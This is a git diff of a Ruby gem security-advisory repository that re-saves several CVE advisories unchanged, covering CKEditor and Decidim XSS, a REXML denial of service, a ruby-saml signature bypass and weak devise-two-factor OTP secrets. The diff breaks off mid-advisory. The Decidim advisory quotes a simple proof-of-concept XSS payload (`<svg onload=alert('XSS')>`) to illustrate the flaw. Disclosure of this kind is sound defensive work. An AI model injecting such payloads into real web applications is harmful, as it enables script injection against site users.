@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2024-43407 (ckeditor): Code Snippet GeSHi plugin in CKEditor 4 has reflected
-  cross-site scripting (XSS) vulnerability'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2024-43407
-  ghsa: 7r32-vfj5-c2jv
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7r32-vfj5-c2jv
-  title: Code Snippet GeSHi plugin in CKEditor 4 has reflected cross-site scripting
-    (XSS) vulnerability
-  date: 2024-08-21
-  description: |-
-    ### Affected packages
-    The vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.
-
-    The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.
-
-    ### Patches
-
-    The [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.
-
-    To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0) . Please be aware of and understand the potential security vulnerabilities associated with its use.
-
-    The fix is be available in version 4.25.0-lts.
-
-    ### Acknowledgements
-
-    The CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.
-
-    ### For more information
-
-    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
-  cvss_v3: 6.1
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7r32-vfj5-c2jv
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43407
-    - https://github.com/ckeditor/ckeditor4/commit/71072c9f7f263329841bd38e7e5309074c82ef94
-    - https://github.com/ckeditor/ckeditor4/commit/951e7d75fcbcaa2590b0719fb0bb0dd0539ca6fa
-    - https://github.com/advisories/GHSA-7r32-vfj5-c2jv
----
+---
+layout: advisory
+title: 'CVE-2024-43407 (ckeditor): Code Snippet GeSHi plugin in CKEditor 4 has reflected
+  cross-site scripting (XSS) vulnerability'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2024-43407
+  ghsa: 7r32-vfj5-c2jv
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7r32-vfj5-c2jv
+  title: Code Snippet GeSHi plugin in CKEditor 4 has reflected cross-site scripting
+    (XSS) vulnerability
+  date: 2024-08-21
+  description: |-
+    ### Affected packages
+    The vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.
+
+    The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.
+
+    ### Patches
+
+    The [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.
+
+    To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0) . Please be aware of and understand the potential security vulnerabilities associated with its use.
+
+    The fix is be available in version 4.25.0-lts.
+
+    ### Acknowledgements
+
+    The CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.
+
+    ### For more information
+
+    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
+  cvss_v3: 6.1
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7r32-vfj5-c2jv
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43407
+    - https://github.com/ckeditor/ckeditor4/commit/71072c9f7f263329841bd38e7e5309074c82ef94
+    - https://github.com/ckeditor/ckeditor4/commit/951e7d75fcbcaa2590b0719fb0bb0dd0539ca6fa
+    - https://github.com/advisories/GHSA-7r32-vfj5-c2jv
+---
diff --git a/advisories/_posts/2024-08-21-CVE-2024-43411.md b/advisories/_posts/2024-08-21-CVE-2024-43411.md
index 6ffcfb17..827b26cd 100644
--- a/advisories/_posts/2024-08-21-CVE-2024-43411.md
+++ b/advisories/_posts/2024-08-21-CVE-2024-43411.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2024-43411 (ckeditor): CKEditor4 low-risk cross-site scripting (XSS) vulnerability
-  linked to potential domain takeover'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2024-43411
-  ghsa: 6v96-m24v-f58j
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6v96-m24v-f58j
-  title: CKEditor4 low-risk cross-site scripting (XSS) vulnerability linked to potential
-    domain takeover
-  date: 2024-08-21
-  description: |-
-    ### Affected Packages
-
-    The issue impacts only editor instances with enabled [version notifications](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_config.html#cfg-versionCheck).
-
-    Please note that this feature is disabled by default in all CKEditor 4 LTS versions. Therefore, if you use CKEditor 4 LTS, it is highly unlikely that you are affected by this vulnerability. If you are unsure, please [contact us](mailto:security@cksource.com).
-
-    ### Impact
-
-    A theoretical vulnerability has been identified in CKEditor 4.22 (and above). In a highly unlikely scenario where an attacker gains control over the https://cke4.ckeditor.com domain, they could potentially execute an attack on CKEditor 4 instances. Although the vulnerability is purely hypothetical, we have addressed it in CKEditor 4.25.0-lts to ensure compliance with security best practices.
-
-    ### Patches
-
-    The issue has been recognized and patched. The fix is available in version 4.25.0-lts.
-
-    ### For More Information
-
-    If you have any questions or comments about this advisory, please email us at [security@cksource.com](mailto:security@cksource.com).
-  cvss_v3: 3.1
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6v96-m24v-f58j
-    - https://github.com/ckeditor/ckeditor4/commit/b5069c9cb769ea22eae1cbd7200f22b1cf2e3a7f
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43411
-    - https://github.com/advisories/GHSA-6v96-m24v-f58j
----
+---
+layout: advisory
+title: 'CVE-2024-43411 (ckeditor): CKEditor4 low-risk cross-site scripting (XSS) vulnerability
+  linked to potential domain takeover'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2024-43411
+  ghsa: 6v96-m24v-f58j
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6v96-m24v-f58j
+  title: CKEditor4 low-risk cross-site scripting (XSS) vulnerability linked to potential
+    domain takeover
+  date: 2024-08-21
+  description: |-
+    ### Affected Packages
+
+    The issue impacts only editor instances with enabled [version notifications](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_config.html#cfg-versionCheck).
+
+    Please note that this feature is disabled by default in all CKEditor 4 LTS versions. Therefore, if you use CKEditor 4 LTS, it is highly unlikely that you are affected by this vulnerability. If you are unsure, please [contact us](mailto:security@cksource.com).
+
+    ### Impact
+
+    A theoretical vulnerability has been identified in CKEditor 4.22 (and above). In a highly unlikely scenario where an attacker gains control over the https://cke4.ckeditor.com domain, they could potentially execute an attack on CKEditor 4 instances. Although the vulnerability is purely hypothetical, we have addressed it in CKEditor 4.25.0-lts to ensure compliance with security best practices.
+
+    ### Patches
+
+    The issue has been recognized and patched. The fix is available in version 4.25.0-lts.
+
+    ### For More Information
+
+    If you have any questions or comments about this advisory, please email us at [security@cksource.com](mailto:security@cksource.com).
+  cvss_v3: 3.1
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6v96-m24v-f58j
+    - https://github.com/ckeditor/ckeditor4/commit/b5069c9cb769ea22eae1cbd7200f22b1cf2e3a7f
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43411
+    - https://github.com/advisories/GHSA-6v96-m24v-f58j
+---
diff --git a/advisories/_posts/2024-08-22-CVE-2024-43398.md b/advisories/_posts/2024-08-22-CVE-2024-43398.md
index aa144f3a..021ffad2 100644
--- a/advisories/_posts/2024-08-22-CVE-2024-43398.md
+++ b/advisories/_posts/2024-08-22-CVE-2024-43398.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2024-43398 (rexml): REXML denial of service vulnerability'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-43398
-  ghsa: vmwr-mc7x-5vc3
-  url: https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3
-  title: REXML denial of service vulnerability
-  date: 2024-08-22
-  description: |
-    ### Impact
-
-    The REXML gem before 3.3.6 has a DoS vulnerability when it parses an
-    XML that has many deep elements that have same local name attributes.
-
-    If you need to parse untrusted XMLs with tree parser API like
-    `REXML::Document.new`, you may be impacted to this vulnerability.
-    If you use other parser APIs such as stream parser API and SAX2
-    parser API, this vulnerability is not affected.
-
-    This vulnerability has been assigned the CVE identifier CVE-2024-43398.
-    We strongly recommend upgrading the REXML gem.
-
-    ### Patches
-
-    The REXML gem 3.3.6 or later include the patch to fix the
-    vulnerability.
-
-    ### Workarounds
-
-    Don't parse untrusted XMLs with tree parser API.
-
-    ## Affected versions
-
-    REXML gem 3.3.5 or prior
-
-    ## Credits
-
-    Thanks to l33thaxor for discovering this issue.
-
-    ## History
-
-    Originally published at 2024-08-22 03:00:00 (UTC)
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 3.3.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43398
-    - https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398
-    - https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3
-    - https://github.com/ruby/rexml/commit/7cb5eaeb221c322b9912f724183294d8ce96bae3
-    - https://github.com/ruby/rexml/releases/tag/v3.3.6
-    - https://hackerone.com/reports/3002543
-    - https://hackerone.com/reports/2666849
-    - https://github.com/advisories/GHSA-vmwr-mc7x-5vc3
----
+---
+layout: advisory
+title: 'CVE-2024-43398 (rexml): REXML denial of service vulnerability'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-43398
+  ghsa: vmwr-mc7x-5vc3
+  url: https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3
+  title: REXML denial of service vulnerability
+  date: 2024-08-22
+  description: |
+    ### Impact
+
+    The REXML gem before 3.3.6 has a DoS vulnerability when it parses an
+    XML that has many deep elements that have same local name attributes.
+
+    If you need to parse untrusted XMLs with tree parser API like
+    `REXML::Document.new`, you may be impacted to this vulnerability.
+    If you use other parser APIs such as stream parser API and SAX2
+    parser API, this vulnerability is not affected.
+
+    This vulnerability has been assigned the CVE identifier CVE-2024-43398.
+    We strongly recommend upgrading the REXML gem.
+
+    ### Patches
+
+    The REXML gem 3.3.6 or later include the patch to fix the
+    vulnerability.
+
+    ### Workarounds
+
+    Don't parse untrusted XMLs with tree parser API.
+
+    ## Affected versions
+
+    REXML gem 3.3.5 or prior
+
+    ## Credits
+
+    Thanks to l33thaxor for discovering this issue.
+
+    ## History
+
+    Originally published at 2024-08-22 03:00:00 (UTC)
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 3.3.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43398
+    - https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398
+    - https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3
+    - https://github.com/ruby/rexml/commit/7cb5eaeb221c322b9912f724183294d8ce96bae3
+    - https://github.com/ruby/rexml/releases/tag/v3.3.6
+    - https://hackerone.com/reports/3002543
+    - https://hackerone.com/reports/2666849
+    - https://github.com/advisories/GHSA-vmwr-mc7x-5vc3
+---
diff --git a/advisories/_posts/2024-08-23-CVE-2024-43791.md b/advisories/_posts/2024-08-23-CVE-2024-43791.md
index 320fd1fc..8f59973a 100644
--- a/advisories/_posts/2024-08-23-CVE-2024-43791.md
+++ b/advisories/_posts/2024-08-23-CVE-2024-43791.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2024-43791 (request_store): request_store has Incorrect Default Permissions'
-comments: false
-categories:
-- request_store
-advisory:
-  gem: request_store
-  cve: 2024-43791
-  ghsa: frp2-5qfc-7r8m
-  url: https://github.com/steveklabnik/request_store/security/advisories/GHSA-frp2-5qfc-7r8m
-  title: request_store has Incorrect Default Permissions
-  date: 2024-08-23
-  description: |
-    ### Impact
-
-    The files published as part of request_store 1.3.2 have 0666
-    permissions, meaning that they are world-writable, which allows
-    local users to execute arbitrary code.
-
-    This version was published in 2017, and most production environments
-    do not allow access for local users, so the chances of this being
-    exploited are very low, given that the vast majority of users will
-    have upgraded, and those that have not, if any, are not likely to
-    be exposed.
-
-    ### Patches
-
-    I am not aware of any other version of the gem with incorrect
-    permissions, so simply upgrading should fix the issue.
-
-    ### Workarounds
-
-    You could chmod the files yourself, I guess.
-  cvss_v3: 7.8
-  unaffected_versions:
-  - "< 1.3.2"
-  patched_versions:
-  - ">= 1.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43791
-    - https://github.com/steveklabnik/request_store/security/advisories/GHSA-frp2-5qfc-7r8m
-    - https://cwe.mitre.org/data/definitions/276.html
-    - https://github.com/advisories/GHSA-frp2-5qfc-7r8m
----
+---
+layout: advisory
+title: 'CVE-2024-43791 (request_store): request_store has Incorrect Default Permissions'
+comments: false
+categories:
+- request_store
+advisory:
+  gem: request_store
+  cve: 2024-43791
+  ghsa: frp2-5qfc-7r8m
+  url: https://github.com/steveklabnik/request_store/security/advisories/GHSA-frp2-5qfc-7r8m
+  title: request_store has Incorrect Default Permissions
+  date: 2024-08-23
+  description: |
+    ### Impact
+
+    The files published as part of request_store 1.3.2 have 0666
+    permissions, meaning that they are world-writable, which allows
+    local users to execute arbitrary code.
+
+    This version was published in 2017, and most production environments
+    do not allow access for local users, so the chances of this being
+    exploited are very low, given that the vast majority of users will
+    have upgraded, and those that have not, if any, are not likely to
+    be exposed.
+
+    ### Patches
+
+    I am not aware of any other version of the gem with incorrect
+    permissions, so simply upgrading should fix the issue.
+
+    ### Workarounds
+
+    You could chmod the files yourself, I guess.
+  cvss_v3: 7.8
+  unaffected_versions:
+  - "< 1.3.2"
+  patched_versions:
+  - ">= 1.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43791
+    - https://github.com/steveklabnik/request_store/security/advisories/GHSA-frp2-5qfc-7r8m
+    - https://cwe.mitre.org/data/definitions/276.html
+    - https://github.com/advisories/GHSA-frp2-5qfc-7r8m
+---
diff --git a/advisories/_posts/2024-08-28-CVE-2024-45409.md b/advisories/_posts/2024-08-28-CVE-2024-45409.md
index c81b98cd..007bde3c 100644
--- a/advisories/_posts/2024-08-28-CVE-2024-45409.md
+++ b/advisories/_posts/2024-08-28-CVE-2024-45409.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2024-45409 (ruby-saml): SAML authentication bypass via Incorrect XPath
-  selector'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2024-45409
-  ghsa: jw9c-mfg7-9rx2
-  url: https://github.com/SAML-Toolkits/ruby-saml/commit/1ec5392bc506fe43a02dbb66b68741051c5ffeae
-  title: SAML authentication bypass via Incorrect XPath selector
-  date: 2024-08-28
-  description: |
-    Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response.
-    An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML
-    Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within
-    the vulnerable system.
-  cvss_v3: 10.0
-  patched_versions:
-  - "~> 1.12.3"
-  - ">= 1.17.0"
----
+---
+layout: advisory
+title: 'CVE-2024-45409 (ruby-saml): SAML authentication bypass via Incorrect XPath
+  selector'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2024-45409
+  ghsa: jw9c-mfg7-9rx2
+  url: https://github.com/SAML-Toolkits/ruby-saml/commit/1ec5392bc506fe43a02dbb66b68741051c5ffeae
+  title: SAML authentication bypass via Incorrect XPath selector
+  date: 2024-08-28
+  description: |
+    Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response.
+    An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML
+    Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within
+    the vulnerable system.
+  cvss_v3: 10.0
+  patched_versions:
+  - "~> 1.12.3"
+  - ">= 1.17.0"
+---
diff --git a/advisories/_posts/2024-09-11-CVE-2024-45409.md b/advisories/_posts/2024-09-11-CVE-2024-45409.md
index 6f803793..014c07f4 100644
--- a/advisories/_posts/2024-09-11-CVE-2024-45409.md
+++ b/advisories/_posts/2024-09-11-CVE-2024-45409.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2024-45409 (omniauth-saml): omniauth-saml vulnerable to Improper Verification
-  of Cryptographic Signature'
-comments: false
-categories:
-- omniauth-saml
-advisory:
-  gem: omniauth-saml
-  cve: 2024-45409
-  ghsa: cvp8-5r8g-fhvq
-  url: https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
-  title: omniauth-saml vulnerable to Improper Verification of Cryptographic Signature
-  date: 2024-09-11
-  description: |
-    ruby-saml, the dependent SAML gem of omniauth-saml has a signature
-    wrapping vulnerability in <= v1.12.0 and v1.13.0 to v1.16.0 , see
-    https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
-
-    As a result, omniauth-saml created a
-    [new release](https://github.com/omniauth/omniauth-saml/releases)
-    by upgrading ruby-saml to the patched versions v1.17.
-  cvss_v3: 10.0
-  patched_versions:
-  - ">= 1.10.5, < 2.0.0"
-  - "~> 2.1.2"
-  - ">= 2.2.1"
-  related:
-    ghsa:
-    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
-    - https://github.com/advisories/GHSA-cvp8-5r8g-fhvq
-    url:
-    - https://github.com/omniauth/omniauth-saml/commit/4274e9d57e65f2dcaae4aa3b2accf831494f2ddd
-    - https://github.com/omniauth/omniauth-saml/commit/6c681fd082ab3daf271821897a40ab3417382e29
----
+---
+layout: advisory
+title: 'CVE-2024-45409 (omniauth-saml): omniauth-saml vulnerable to Improper Verification
+  of Cryptographic Signature'
+comments: false
+categories:
+- omniauth-saml
+advisory:
+  gem: omniauth-saml
+  cve: 2024-45409
+  ghsa: cvp8-5r8g-fhvq
+  url: https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
+  title: omniauth-saml vulnerable to Improper Verification of Cryptographic Signature
+  date: 2024-09-11
+  description: |
+    ruby-saml, the dependent SAML gem of omniauth-saml has a signature
+    wrapping vulnerability in <= v1.12.0 and v1.13.0 to v1.16.0 , see
+    https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+
+    As a result, omniauth-saml created a
+    [new release](https://github.com/omniauth/omniauth-saml/releases)
+    by upgrading ruby-saml to the patched versions v1.17.
+  cvss_v3: 10.0
+  patched_versions:
+  - ">= 1.10.5, < 2.0.0"
+  - "~> 2.1.2"
+  - ">= 2.2.1"
+  related:
+    ghsa:
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+    - https://github.com/advisories/GHSA-cvp8-5r8g-fhvq
+    url:
+    - https://github.com/omniauth/omniauth-saml/commit/4274e9d57e65f2dcaae4aa3b2accf831494f2ddd
+    - https://github.com/omniauth/omniauth-saml/commit/6c681fd082ab3daf271821897a40ab3417382e29
+---
diff --git a/advisories/_posts/2024-09-16-CVE-2024-32034.md b/advisories/_posts/2024-09-16-CVE-2024-32034.md
index 38c814ec..5abd344d 100644
--- a/advisories/_posts/2024-09-16-CVE-2024-32034.md
+++ b/advisories/_posts/2024-09-16-CVE-2024-32034.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-32034 (decidim-admin): Decidim::Admin vulnerable to cross-site scripting
-  (XSS) in the admin activity log'
-comments: false
-categories:
-- decidim-admin
-advisory:
-  gem: decidim-admin
-  cve: 2024-32034
-  ghsa: rx9f-5ggv-5rh6
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-rx9f-5ggv-5rh6
-  title: Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin activity
-    log
-  date: 2024-09-16
-  description: |
-    ### Impact
-    The admin panel is subject to potential XSS attach in case an admin
-    assigns a valuator to a proposal, or does any other action that
-    generates an admin activity log where one of the resources has an
-    XSS crafted.
-
-    ### Patches
-    N/A
-
-    ### Workarounds
-    Redirect the pages /admin and /admin/logs to other admin pages
-    to prevent this access (i.e. `/admin/organization/edit`)
-
-    ### References
-    OWASP ASVS v4.0.3-5.1.3
-  cvss_v3: 6.8
-  patched_versions:
-  - "~> 0.27.7"
-  - ">= 0.28.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-32034
-    - https://github.com/decidim/decidim/security/advisories/GHSA-rx9f-5ggv-5rh6
-    - https://github.com/decidim/decidim/commit/23fc8d702a4976727f78617f5e42353d67931645
-    - https://github.com/decidim/decidim/commit/9d79f09a2d38c87feb28725670d6cc1f55c22072
-    - https://github.com/decidim/decidim/commit/e494235d559be13dd1f8694345e6f6bba762d1c0
-    - https://github.com/decidim/decidim/commit/ff755e23814aeb56e9089fc08006a5d3faee47b6
-    - https://github.com/advisories/GHSA-rx9f-5ggv-5rh6
----
+---
+layout: advisory
+title: 'CVE-2024-32034 (decidim-admin): Decidim::Admin vulnerable to cross-site scripting
+  (XSS) in the admin activity log'
+comments: false
+categories:
+- decidim-admin
+advisory:
+  gem: decidim-admin
+  cve: 2024-32034
+  ghsa: rx9f-5ggv-5rh6
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-rx9f-5ggv-5rh6
+  title: Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin activity
+    log
+  date: 2024-09-16
+  description: |
+    ### Impact
+    The admin panel is subject to potential XSS attach in case an admin
+    assigns a valuator to a proposal, or does any other action that
+    generates an admin activity log where one of the resources has an
+    XSS crafted.
+
+    ### Patches
+    N/A
+
+    ### Workarounds
+    Redirect the pages /admin and /admin/logs to other admin pages
+    to prevent this access (i.e. `/admin/organization/edit`)
+
+    ### References
+    OWASP ASVS v4.0.3-5.1.3
+  cvss_v3: 6.8
+  patched_versions:
+  - "~> 0.27.7"
+  - ">= 0.28.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32034
+    - https://github.com/decidim/decidim/security/advisories/GHSA-rx9f-5ggv-5rh6
+    - https://github.com/decidim/decidim/commit/23fc8d702a4976727f78617f5e42353d67931645
+    - https://github.com/decidim/decidim/commit/9d79f09a2d38c87feb28725670d6cc1f55c22072
+    - https://github.com/decidim/decidim/commit/e494235d559be13dd1f8694345e6f6bba762d1c0
+    - https://github.com/decidim/decidim/commit/ff755e23814aeb56e9089fc08006a5d3faee47b6
+    - https://github.com/advisories/GHSA-rx9f-5ggv-5rh6
+---
diff --git a/advisories/_posts/2024-09-16-CVE-2024-39910.md b/advisories/_posts/2024-09-16-CVE-2024-39910.md
index 2c400955..ec5a10ad 100644
--- a/advisories/_posts/2024-09-16-CVE-2024-39910.md
+++ b/advisories/_posts/2024-09-16-CVE-2024-39910.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2024-39910 (decidim): Decidim::Admin vulnerable to cross-site scripting
-  (XSS) in the admin panel with QuillJS WYSWYG editor'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2024-39910
-  ghsa: vvqw-fqwx-mqmm
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-vvqw-fqwx-mqmm
-  title: Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin panel
-    with QuillJS WYSWYG editor
-  date: 2024-09-16
-  description: |
-    ### Impact
-    The WYSWYG editor QuillJS is subject to potential XSS attach in
-    case the attacker manages to modify the HTML before being
-    uploaded to the server.
-
-    The attacker is able to change e.g. to <svg onload=alert('XSS')>
-    if they know how to craft these requests themselves.
-
-    ### Patches
-    N/A
-
-    ### Workarounds
-    Review the user accounts that have access to the admin panel (i.e.
-    general Administrators, and participatory space's Administrators)
-    and remove access to them if they don't need it.
-
-    Disable the "Enable rich text editor for participants" setting in
-    the admin dashboard.
-
-    ### References
-    OWASP ASVS v4.0.3-5.1.3
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 0.27.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-39910
-    - https://github.com/decidim/decidim/security/advisories/GHSA-vvqw-fqwx-mqmm
-    - https://github.com/decidim/decidim/commit/47adca81cabea898005ec07b130b008f2a2be99f
-    - https://github.com/advisories/GHSA-vvqw-fqwx-mqmm
----
+---
+layout: advisory
+title: 'CVE-2024-39910 (decidim): Decidim::Admin vulnerable to cross-site scripting
+  (XSS) in the admin panel with QuillJS WYSWYG editor'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2024-39910
+  ghsa: vvqw-fqwx-mqmm
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-vvqw-fqwx-mqmm
+  title: Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin panel
+    with QuillJS WYSWYG editor
+  date: 2024-09-16
+  description: |
+    ### Impact
+    The WYSWYG editor QuillJS is subject to potential XSS attach in
+    case the attacker manages to modify the HTML before being
+    uploaded to the server.
+
+    The attacker is able to change e.g. to <svg onload=alert('XSS')>
+    if they know how to craft these requests themselves.
+
+    ### Patches
+    N/A
+
+    ### Workarounds
+    Review the user accounts that have access to the admin panel (i.e.
+    general Administrators, and participatory space's Administrators)
+    and remove access to them if they don't need it.
+
+    Disable the "Enable rich text editor for participants" setting in
+    the admin dashboard.
+
+    ### References
+    OWASP ASVS v4.0.3-5.1.3
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 0.27.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-39910
+    - https://github.com/decidim/decidim/security/advisories/GHSA-vvqw-fqwx-mqmm
+    - https://github.com/decidim/decidim/commit/47adca81cabea898005ec07b130b008f2a2be99f
+    - https://github.com/advisories/GHSA-vvqw-fqwx-mqmm
+---
diff --git a/advisories/_posts/2024-09-17-CVE-2024-8796.md b/advisories/_posts/2024-09-17-CVE-2024-8796.md
index 0848185c..2d4643b9 100644
--- a/advisories/_posts/2024-09-17-CVE-2024-8796.md
+++ b/advisories/_posts/2024-09-17-CVE-2024-8796.md
@@ -1,70 +1,70 @@
----
-layout: advisory
-title: 'CVE-2024-8796 (devise-two-factor): Devise-Two-Factor Authentication Uses Insufficient
-  Default OTP Shared Secret Length'
-comments: false
-categories:
-- devise-two-factor
-advisory:
-  gem: devise-two-factor
-  cve: 2024-8796
-  ghsa: qjxf-mc72-wjr2
-  url: https://github.com/devise-two-factor/devise-two-factor/security/advisories/GHSA-qjxf-mc72-wjr2
-  title: Devise-Two-Factor Authentication Uses Insufficient Default OTP Shared Secret
-    Length
-  date: 2024-09-17
-  description: |
-    ### Summary
-    Under the default configuration, Devise-Two-Factor version
-    >= 2.2.0 & < 6.0.0 generate TOTP shared secrets that are 120 bits
-    instead of the 128-bit minimum defined by
-    [RFC 4226](https://datatracker.ietf.org/doc/html/rfc4226).
-    Using a shared secret shorter than the minimum to generate a
-    multi-factor authentication code could make it easier for an
-    attacker to guess the shared secret and generate valid TOTP codes.
-
-    ### Remediation
-    Devise-Two-Factor should be upgraded to version v6.0.0 as soon
-    as possible. After upgrading, the length of shared secrets and
-    TOTP URLs generated by the library will increase since the new
-    shared secrets will be longer.
-
-    If upgrading is not possible, you can override the default
-    `otp_secret_length` attribute in the model when configuring
-    `two_factor_authenticable` and set it to a value of at least
-    26 to ensure newly generated shared secrets are at least
-    128-bits long.
-
-    After upgrading or implementing the workaround, applications
-    using Devise-Two-Factor may wish to migrate users to the new
-    OTP length to provide increased protection for those accounts.
-    Turning off OTP for users by setting `otp_required_for_login`
-    to false is not recommended since it would leave accounts
-    unprotected. However, you may wish to implement application
-    logic that checks the length of a user's shared secret and
-    prompts users to re-enroll in OTP.
-
-    ### Background
